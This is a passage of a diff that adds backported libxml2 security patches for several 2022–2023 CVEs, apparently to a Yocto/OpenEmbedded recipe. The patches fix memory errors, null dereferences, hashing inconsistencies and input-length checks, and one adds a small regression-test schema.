348@@ -4221,13 +4231,6 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
349 if (len + 5 >= size) {
350 xmlChar *tmp;
351
352- if ((size > XML_MAX_NAME_LENGTH) &&
353- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
354- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
355- xmlFree(buf);
356- ctxt->instate = (xmlParserInputState) state;
357- return(NULL);
358- }
359 size *= 2;
360 tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
361 if (tmp == NULL) {
362@@ -4256,6 +4259,12 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
363 SHRINK;
364 cur = CUR_CHAR(l);
365 }
366+ if (len > maxLength) {
367+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
368+ xmlFree(buf);
369+ ctxt->instate = (xmlParserInputState) state;
370+ return(NULL);
371+ }
372 }
373 buf[len] = 0;
374 ctxt->instate = (xmlParserInputState) state;
375@@ -4283,6 +4292,9 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
376 xmlChar *buf = NULL;
377 int len = 0;
378 int size = XML_PARSER_BUFFER_SIZE;
379+ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
380+ XML_MAX_TEXT_LENGTH :
381+ XML_MAX_NAME_LENGTH;
382 xmlChar cur;
383 xmlChar stop;
384 int count = 0;
385@@ -4310,12 +4322,6 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
386 if (len + 1 >= size) {
387 xmlChar *tmp;
388
389- if ((size > XML_MAX_NAME_LENGTH) &&
390- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
391- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
392- xmlFree(buf);
393- return(NULL);
394- }
395 size *= 2;
396 tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
397 if (tmp == NULL) {
398@@ -4343,6 +4349,11 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
399 SHRINK;
400 cur = CUR;
401 }
402+ if (len > maxLength) {
403+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
404+ xmlFree(buf);
405+ return(NULL);
406+ }
407 }
408 buf[len] = 0;
409 if (cur != stop) {
410@@ -4742,6 +4753,9 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
411 int r, rl;
412 int cur, l;
413 size_t count = 0;
414+ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
415+ XML_MAX_HUGE_LENGTH :
416+ XML_MAX_TEXT_LENGTH;
417 int inputid;
418
419 inputid = ctxt->input->id;
420@@ -4787,13 +4801,6 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
421 if ((r == '-') && (q == '-')) {
422 xmlFatalErr(ctxt, XML_ERR_HYPHEN_IN_COMMENT, NULL);
423 }
424- if ((len > XML_MAX_TEXT_LENGTH) &&
425- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
426- xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
427- "Comment too big found", NULL);
428- xmlFree (buf);
429- return;
430- }
431 if (len + 5 >= size) {
432 xmlChar *new_buf;
433 size_t new_size;
434@@ -4831,6 +4838,13 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
435 GROW;
436 cur = CUR_CHAR(l);
437 }
438+
439+ if (len > maxLength) {
440+ xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
441+ "Comment too big found", NULL);
442+ xmlFree (buf);
443+ return;
444+ }
445 }
446 buf[len] = 0;
447 if (cur == 0) {
448@@ -4875,6 +4889,9 @@ xmlParseComment(xmlParserCtxtPtr ctxt) {
449 xmlChar *buf = NULL;
450 size_t size = XML_PARSER_BUFFER_SIZE;
451 size_t len = 0;
452+ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
453+ XML_MAX_HUGE_LENGTH :
454+ XML_MAX_TEXT_LENGTH;
455 xmlParserInputState state;
456 const xmlChar *in;
457 size_t nbchar = 0;
458@@ -4958,8 +4975,7 @@ get_more:
459 buf[len] = 0;
460 }
461 }
462- if ((len > XML_MAX_TEXT_LENGTH) &&
463- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
464+ if (len > maxLength) {
465 xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
466 "Comment too big found", NULL);
467 xmlFree (buf);
468@@ -5159,6 +5175,9 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
469 xmlChar *buf = NULL;
470 size_t len = 0;
471 size_t size = XML_PARSER_BUFFER_SIZE;
472+ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
473+ XML_MAX_HUGE_LENGTH :
474+ XML_MAX_TEXT_LENGTH;
475 int cur, l;
476 const xmlChar *target;
477 xmlParserInputState state;
478@@ -5234,14 +5253,6 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
479 return;
480 }
481 count = 0;
482- if ((len > XML_MAX_TEXT_LENGTH) &&
483- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
484- xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
485- "PI %s too big found", target);
486- xmlFree(buf);
487- ctxt->instate = state;
488- return;
489- }
490 }
491 COPY_BUF(l,buf,len,cur);
492 NEXTL(l);
493@@ -5251,15 +5262,14 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
494 GROW;
495 cur = CUR_CHAR(l);
496 }
497+ if (len > maxLength) {
498+ xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
499+ "PI %s too big found", target);
500+ xmlFree(buf);
501+ ctxt->instate = state;
502+ return;
503+ }
504 }
505- if ((len > XML_MAX_TEXT_LENGTH) &&
506- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
507- xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
508- "PI %s too big found", target);
509- xmlFree(buf);
510- ctxt->instate = state;
511- return;
512- }
513 buf[len] = 0;
514 if (cur != '?') {
515 xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
516@@ -8954,6 +8964,9 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
517 const xmlChar *in = NULL, *start, *end, *last;
518 xmlChar *ret = NULL;
519 int line, col;
520+ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
521+ XML_MAX_HUGE_LENGTH :
522+ XML_MAX_TEXT_LENGTH;
523
524 GROW;
525 in = (xmlChar *) CUR_PTR;
526@@ -8993,8 +9006,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
527 start = in;
528 if (in >= end) {
529 GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
530- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
531- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
532+ if ((in - start) > maxLength) {
533 xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
534 "AttValue length too long\n");
535 return(NULL);
536@@ -9007,8 +9019,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
537 if ((*in++ == 0x20) && (*in == 0x20)) break;
538 if (in >= end) {
539 GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
540- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
541- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
542+ if ((in - start) > maxLength) {
543 xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
544 "AttValue length too long\n");
545 return(NULL);
546@@ -9041,16 +9052,14 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
547 last = last + delta;
548 }
549 end = ctxt->input->end;
550- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
551- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
552+ if ((in - start) > maxLength) {
553 xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
554 "AttValue length too long\n");
555 return(NULL);
556 }
557 }
558 }
559- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
560- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
561+ if ((in - start) > maxLength) {
562 xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
563 "AttValue length too long\n");
564 return(NULL);
565@@ -9063,8 +9072,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
566 col++;
567 if (in >= end) {
568 GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
569- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
570- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
571+ if ((in - start) > maxLength) {
572 xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
573 "AttValue length too long\n");
574 return(NULL);
575@@ -9072,8 +9080,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
576 }
577 }
578 last = in;
579- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
580- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
581+ if ((in - start) > maxLength) {
582 xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
583 "AttValue length too long\n");
584 return(NULL);
585@@ -9763,6 +9770,9 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
586 int s, sl;
587 int cur, l;
588 int count = 0;
589+ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
590+ XML_MAX_HUGE_LENGTH :
591+ XML_MAX_TEXT_LENGTH;
592
593 /* Check 2.6.0 was NXT(0) not RAW */
594 if (CMP9(CUR_PTR, '<', '!', '[', 'C', 'D', 'A', 'T', 'A', '[')) {
595@@ -9796,13 +9806,6 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
596 if (len + 5 >= size) {
597 xmlChar *tmp;
598
599- if ((size > XML_MAX_TEXT_LENGTH) &&
600- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
601- xmlFatalErrMsgStr(ctxt, XML_ERR_CDATA_NOT_FINISHED,
602- "CData section too big found", NULL);
603- xmlFree (buf);
604- return;
605- }
606 tmp = (xmlChar *) xmlRealloc(buf, size * 2 * sizeof(xmlChar));
607 if (tmp == NULL) {
608 xmlFree(buf);
609@@ -9829,6 +9832,12 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
610 }
611 NEXTL(l);
612 cur = CUR_CHAR(l);
613+ if (len > maxLength) {
614+ xmlFatalErrMsg(ctxt, XML_ERR_CDATA_NOT_FINISHED,
615+ "CData section too big found\n");
616+ xmlFree(buf);
617+ return;
618+ }
619 }
620 buf[len] = 0;
621 ctxt->instate = XML_PARSER_CONTENT;
622--
623GitLab
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
new file mode 100644
index 0000000000..c19726fe9f
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
@@ -0,0 +1,104 @@
1From 1b41ec4e9433b05bb0376be4725804c54ef1d80b Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Wed, 31 Aug 2022 22:11:25 +0200
4Subject: [PATCH] [CVE-2022-40304] Fix dict corruption caused by entity
5 reference cycles
6
7When an entity reference cycle is detected, the entity content is
8cleared by setting its first byte to zero. But the entity content might
9be allocated from a dict. In this case, the dict entry becomes corrupted
10leading to all kinds of logic errors, including memory errors like
11double-frees.
12
13Stop storing entity content, orig, ExternalID and SystemID in a dict.
14These values are unlikely to occur multiple times in a document, so they
15shouldn't have been stored in a dict in the first place.
16
17Thanks to Ned Williamson and Nathan Wachholz working with Google Project
18Zero for the report!
19
20CVE: CVE-2022-40304
21Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1b41ec4e9433b05bb0376be4725804c54ef1d80b]
22Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
23---
24 entities.c | 55 ++++++++++++++++--------------------------------------
25 1 file changed, 16 insertions(+), 39 deletions(-)
26
27diff --git a/entities.c b/entities.c
28index 84435515..d4e5412e 100644
29--- a/entities.c
30+++ b/entities.c
31@@ -128,36 +128,19 @@ xmlFreeEntity(xmlEntityPtr entity)
32 if ((entity->children) && (entity->owner == 1) &&
33 (entity == (xmlEntityPtr) entity->children->parent))
34 xmlFreeNodeList(entity->children);
35- if (dict != NULL) {
36- if ((entity->name != NULL) && (!xmlDictOwns(dict, entity->name)))
37- xmlFree((char *) entity->name);
38- if ((entity->ExternalID != NULL) &&
39- (!xmlDictOwns(dict, entity->ExternalID)))
40- xmlFree((char *) entity->ExternalID);
41- if ((entity->SystemID != NULL) &&
42- (!xmlDictOwns(dict, entity->SystemID)))
43- xmlFree((char *) entity->SystemID);
44- if ((entity->URI != NULL) && (!xmlDictOwns(dict, entity->URI)))
45- xmlFree((char *) entity->URI);
46- if ((entity->content != NULL)
47- && (!xmlDictOwns(dict, entity->content)))
48- xmlFree((char *) entity->content);
49- if ((entity->orig != NULL) && (!xmlDictOwns(dict, entity->orig)))
50- xmlFree((char *) entity->orig);
51- } else {
52- if (entity->name != NULL)
53- xmlFree((char *) entity->name);
54- if (entity->ExternalID != NULL)
55- xmlFree((char *) entity->ExternalID);
56- if (entity->SystemID != NULL)
57- xmlFree((char *) entity->SystemID);
58- if (entity->URI != NULL)
59- xmlFree((char *) entity->URI);
60- if (entity->content != NULL)
61- xmlFree((char *) entity->content);
62- if (entity->orig != NULL)
63- xmlFree((char *) entity->orig);
64- }
65+ if ((entity->name != NULL) &&
66+ ((dict == NULL) || (!xmlDictOwns(dict, entity->name))))
67+ xmlFree((char *) entity->name);
68+ if (entity->ExternalID != NULL)
69+ xmlFree((char *) entity->ExternalID);
70+ if (entity->SystemID != NULL)
71+ xmlFree((char *) entity->SystemID);
72+ if (entity->URI != NULL)
73+ xmlFree((char *) entity->URI);
74+ if (entity->content != NULL)
75+ xmlFree((char *) entity->content);
76+ if (entity->orig != NULL)
77+ xmlFree((char *) entity->orig);
78 xmlFree(entity);
79 }
80
81@@ -193,18 +176,12 @@ xmlCreateEntity(xmlDictPtr dict, const xmlChar *name, int type,
82 ret->SystemID = xmlStrdup(SystemID);
83 } else {
84 ret->name = xmlDictLookup(dict, name, -1);
85- if (ExternalID != NULL)
86- ret->ExternalID = xmlDictLookup(dict, ExternalID, -1);
87- if (SystemID != NULL)
88- ret->SystemID = xmlDictLookup(dict, SystemID, -1);
89+ ret->ExternalID = xmlStrdup(ExternalID);
90+ ret->SystemID = xmlStrdup(SystemID);
91 }
92 if (content != NULL) {
93 ret->length = xmlStrlen(content);
94- if ((dict != NULL) && (ret->length < 5))
95- ret->content = (xmlChar *)
96- xmlDictLookup(dict, content, ret->length);
97- else
98- ret->content = xmlStrndup(content, ret->length);
99+ ret->content = xmlStrndup(content, ret->length);
100 } else {
101 ret->length = 0;
102 ret->content = NULL;
103--
104GitLab
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
new file mode 100644
index 0000000000..907f2c4d47
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
@@ -0,0 +1,79 @@
1From e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Fri, 7 Apr 2023 11:46:35 +0200
4Subject: [PATCH] [CVE-2023-28484] Fix null deref in xmlSchemaFixupComplexType
5
6Fix a null pointer dereference when parsing (invalid) XML schemas.
7
8Thanks to Robby Simpson for the report!
9
10Fixes #491.
11
12CVE: CVE-2023-28484
13Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68]
14
15Signed-off-by: Peter Marko <peter.marko@siemens.com>
16---
17 result/schemas/issue491_0_0.err | 1 +
18 test/schemas/issue491_0.xml | 1 +
19 test/schemas/issue491_0.xsd | 18 ++++++++++++++++++
20 xmlschemas.c | 2 +-
21 4 files changed, 21 insertions(+), 1 deletion(-)
22 create mode 100644 result/schemas/issue491_0_0.err
23 create mode 100644 test/schemas/issue491_0.xml
24 create mode 100644 test/schemas/issue491_0.xsd
25
26diff --git a/result/schemas/issue491_0_0.err b/result/schemas/issue491_0_0.err
27new file mode 100644
28index 00000000..9b2bb969
29--- /dev/null
30+++ b/result/schemas/issue491_0_0.err
31@@ -0,0 +1 @@
32+./test/schemas/issue491_0.xsd:8: element complexType: Schemas parser error : complex type 'ChildType': The content type of both, the type and its base type, must either 'mixed' or 'element-only'.
33diff --git a/test/schemas/issue491_0.xml b/test/schemas/issue491_0.xml
34new file mode 100644
35index 00000000..e2b2fc2e
36--- /dev/null
37+++ b/test/schemas/issue491_0.xml
38@@ -0,0 +1 @@
39+<Child xmlns="http://www.test.com">5</Child>
40diff --git a/test/schemas/issue491_0.xsd b/test/schemas/issue491_0.xsd
41new file mode 100644
42index 00000000..81702649
43--- /dev/null
44+++ b/test/schemas/issue491_0.xsd
45@@ -0,0 +1,18 @@
46+<?xml version='1.0' encoding='UTF-8'?>
47+<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns="http://www.test.com" targetNamespace="http://www.test.com" elementFormDefault="qualified" attributeFormDefault="unqualified">
48+ <xs:complexType name="BaseType">
49+ <xs:simpleContent>
50+ <xs:extension base="xs:int" />
51+ </xs:simpleContent>
52+ </xs:complexType>
53+ <xs:complexType name="ChildType">
54+ <xs:complexContent>
55+ <xs:extension base="BaseType">
56+ <xs:sequence>
57+ <xs:element name="bad" type="xs:int" minOccurs="0" maxOccurs="1"/>
58+ </xs:sequence>
59+ </xs:extension>
60+ </xs:complexContent>
61+ </xs:complexType>
62+ <xs:element name="Child" type="ChildType" />
63+</xs:schema>
64diff --git a/xmlschemas.c b/xmlschemas.c
65index 6a353858..a4eaf591 100644
66--- a/xmlschemas.c
67+++ b/xmlschemas.c
68@@ -18632,7 +18632,7 @@ xmlSchemaFixupComplexType(xmlSchemaParserCtxtPtr pctxt,
69 "allowed to appear inside other model groups",
70 NULL, NULL);
71
72- } else if (! dummySequence) {
73+ } else if ((!dummySequence) && (baseType->subtypes != NULL)) {
74 xmlSchemaTreeItemPtr effectiveContent =
75 (xmlSchemaTreeItemPtr) type->subtypes;
76 /*
77--
78GitLab
79
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
new file mode 100644
index 0000000000..1252668577
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
@@ -0,0 +1,42 @@
1From 547edbf1cbdccd46b2e8ff322a456eaa5931c5df Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Fri, 7 Apr 2023 11:49:27 +0200
4Subject: [PATCH] [CVE-2023-29469] Hashing of empty dict strings isn't
5 deterministic
6
7When hashing empty strings which aren't null-terminated,
8xmlDictComputeFastKey could produce inconsistent results. This could
9lead to various logic or memory errors, including double frees.
10
11For consistency the seed is also taken into account, but this shouldn't
12have an impact on security.
13
14Found by OSS-Fuzz.
15
16Fixes #510.
17
18CVE: CVE-2023-29469
19Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/547edbf1cbdccd46b2e8ff322a456eaa5931c5df]
20
21Signed-off-by: Peter Marko <peter.marko@siemens.com>
22---
23 dict.c | 3 ++-
24 1 file changed, 2 insertions(+), 1 deletion(-)
25
26diff --git a/dict.c b/dict.c
27index 86c3f6d7..d7fd1a06 100644
28--- a/dict.c
29+++ b/dict.c
30@@ -451,7 +451,8 @@ static unsigned long
31 xmlDictComputeFastKey(const xmlChar *name, int namelen, int seed) {
32 unsigned long value = seed;
33
34- if (name == NULL) return(0);
35+ if ((name == NULL) || (namelen <= 0))
36+ return(value);
37 value = *name;
38 value <<= 5;
39 if (namelen > 10) {
40--
41GitLab
42
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
new file mode 100644
index 0000000000..9689cec67d
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
@@ -0,0 +1,36 @@
1From d0c3f01e110d54415611c5fa0040cdf4a56053f9 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Sat, 6 May 2023 17:47:37 +0200
4Subject: [PATCH] parser: Fix old SAX1 parser with custom callbacks
5
6For some reason, xmlCtxtUseOptionsInternal set the start and end element
7SAX handlers to the internal DOM builder functions when XML_PARSE_SAX1
8was specified. This means that custom SAX handlers could never work with
9that flag because these functions would receive the wrong user data
10argument and crash immediately.
11
12Fixes #535.
13
14Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d0c3f01e110d54415611c5fa0040cdf4a56053f9]
15CVE: CVE-2023-39615
16Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
17---
18 parser.c | 2 --
19 1 file changed, 2 deletions(-)
20
21diff --git a/parser.c b/parser.c
22index 6e09208..7814e6e 100644
23--- a/parser.c
24+++ b/parser.c
25@@ -15156,8 +15156,6 @@ xmlCtxtUseOptionsInternal(xmlParserCtxtPtr ctxt, int options, const char *encodi
26 }
27 #ifdef LIBXML_SAX1_ENABLED
28 if (options & XML_PARSE_SAX1) {
29- ctxt->sax->startElement = xmlSAX2StartElement;
30- ctxt->sax->endElement = xmlSAX2EndElement;
31 ctxt->sax->startElementNs = NULL;
32 ctxt->sax->endElementNs = NULL;
33 ctxt->sax->initialized = 1;
34--
352.24.4
36
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
new file mode 100644
index 0000000000..ebd9868fac
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
@@ -0,0 +1,71 @@
1From 235b15a590eecf97b09e87bdb7e4f8333e9de129 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Mon, 8 May 2023 17:58:02 +0200
4Subject: [PATCH] SAX: Always initialize SAX1 element handlers
5
6Follow-up to commit d0c3f01e. A parser context will be initialized to
7SAX version 2, but this can be overridden with XML_PARSE_SAX1 later,
8so we must initialize the SAX1 element handlers as well.
9
10Change the check in xmlDetectSAX2 to only look for XML_SAX2_MAGIC, so
11we don't switch to SAX1 if the SAX2 element handlers are NULL.
12
13Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/235b15a590eecf97b09e87bdb7e4f8333e9de129]
14CVE: CVE-2023-39615
15Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
16---
17 SAX2.c | 11 +++++++----
18 parser.c | 5 +----
19 2 files changed, 8 insertions(+), 8 deletions(-)
20
21diff --git a/SAX2.c b/SAX2.c
22index 5f141f9..902d34d 100644
23--- a/SAX2.c
24+++ b/SAX2.c
25@@ -2869,20 +2869,23 @@ xmlSAXVersion(xmlSAXHandler *hdlr, int version)
26 {
27 if (hdlr == NULL) return(-1);
28 if (version == 2) {
29- hdlr->startElement = NULL;
30- hdlr->endElement = NULL;
31 hdlr->startElementNs = xmlSAX2StartElementNs;
32 hdlr->endElementNs = xmlSAX2EndElementNs;
33 hdlr->serror = NULL;
34 hdlr->initialized = XML_SAX2_MAGIC;
35 #ifdef LIBXML_SAX1_ENABLED
36 } else if (version == 1) {
37- hdlr->startElement = xmlSAX2StartElement;
38- hdlr->endElement = xmlSAX2EndElement;
39 hdlr->initialized = 1;
40 #endif /* LIBXML_SAX1_ENABLED */
41 } else
42 return(-1);
43+#ifdef LIBXML_SAX1_ENABLED
44+ hdlr->startElement = xmlSAX2StartElement;
45+ hdlr->endElement = xmlSAX2EndElement;
46+#else
47+ hdlr->startElement = NULL;
48+ hdlr->endElement = NULL;
49+#endif /* LIBXML_SAX1_ENABLED */
50 hdlr->internalSubset = xmlSAX2InternalSubset;
51 hdlr->externalSubset = xmlSAX2ExternalSubset;
52 hdlr->isStandalone = xmlSAX2IsStandalone;
53diff --git a/parser.c b/parser.c
54index 7814e6e..cf0fb38 100644
55--- a/parser.c
56+++ b/parser.c
57@@ -1102,10 +1102,7 @@ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
58 if (ctxt == NULL) return;
59 sax = ctxt->sax;
60 #ifdef LIBXML_SAX1_ENABLED
61- if ((sax) && (sax->initialized == XML_SAX2_MAGIC) &&
62- ((sax->startElementNs != NULL) ||
63- (sax->endElementNs != NULL) ||
64- ((sax->startElement == NULL) && (sax->endElement == NULL))))
65+ if ((sax) && (sax->initialized == XML_SAX2_MAGIC))
66 ctxt->sax2 = 1;
67 #else
68 ctxt->sax2 = 1;
69--
702.24.4
71
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
new file mode 100644
index 0000000000..b177cdaba0
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
@@ -0,0 +1,44 @@
1From 99fc048d7f7292c5ee18e44c400bd73bc63a47ed Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Fri, 14 Aug 2020 14:18:50 +0200
4Subject: [PATCH] Don't use SAX1 if all element handlers are NULL
5
6Running xmllint with "--sax --noout" installs a SAX2 handler with all
7callbacks set to NULL. In this case or similar situations, we don't want
8to switch to SAX1 parsing.
9
10Note: This patch is needed for "CVE-2023-39615-0002" patch to apply.
11Without this patch the build will fail with undefined sax error.
12
13Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/99fc048d7f7292c5ee18e44c400bd73bc63a47ed]
14Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
15---
16 parser.c | 10 +++++++---
17 1 file changed, 7 insertions(+), 3 deletions(-)
18
19diff --git a/parser.c b/parser.c
20index bb677b0..6e09208 100644
21--- a/parser.c
22+++ b/parser.c
23@@ -1098,11 +1098,15 @@ xmlHasFeature(xmlFeature feature)
24 */
25 static void
26 xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
27+ xmlSAXHandlerPtr sax;
28 if (ctxt == NULL) return;
29+ sax = ctxt->sax;
30 #ifdef LIBXML_SAX1_ENABLED
31- if ((ctxt->sax) && (ctxt->sax->initialized == XML_SAX2_MAGIC) &&
32- ((ctxt->sax->startElementNs != NULL) ||
33- (ctxt->sax->endElementNs != NULL))) ctxt->sax2 = 1;
34+ if ((sax) && (sax->initialized == XML_SAX2_MAGIC) &&
35+ ((sax->startElementNs != NULL) ||
36+ (sax->endElementNs != NULL) ||
37+ ((sax->startElement == NULL) && (sax->endElement == NULL))))
38+ ctxt->sax2 = 1;
39 #else
40 ctxt->sax2 = 1;
41 #endif /* LIBXML_SAX1_ENABLED */
42--
432.24.4
44
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
new file mode 100644
index 0000000000..182bb29abd
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
@@ -0,0 +1,50 @@
1From a22bd982bf10291deea8ba0c61bf75b898c604ce Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Wed, 2 Nov 2022 15:44:42 +0100
4Subject: [PATCH] malloc-fail: Fix memory leak in xmlStaticCopyNodeList
5
6Found with libFuzzer, see #344.
7
8Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/a22bd982bf10291deea8ba0c61bf75b898c604ce]
9
10Signed-off-by: Peter Marko <peter.marko@siemens.com>
11Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
12---
13 tree.c | 7 +++++--
14 1 file changed, 5 insertions(+), 2 deletions(-)
15
16diff --git a/tree.c b/tree.c
17index 507869efe..647288ce3 100644
18--- a/tree.c
19+++ b/tree.c
20@@ -4461,7 +4461,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
21 }
22 if (doc->intSubset == NULL) {
23 q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
24- if (q == NULL) return(NULL);
25+ if (q == NULL) goto error;
26 q->doc = doc;
27 q->parent = parent;
28 doc->intSubset = (xmlDtdPtr) q;
29@@ -4473,7 +4473,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
30 } else
31 #endif /* LIBXML_TREE_ENABLED */
32 q = xmlStaticCopyNode(node, doc, parent, 1);
33- if (q == NULL) return(NULL);
34+ if (q == NULL) goto error;
35 if (ret == NULL) {
36 q->prev = NULL;
37 ret = p = q;
38@@ -4486,6 +4486,9 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
39 node = node->next;
40 }
41 return(ret);
42+error:
43+ xmlFreeNodeList(ret);
44+ return(NULL);
45 }
46
47 /**
48--
49GitLab
50
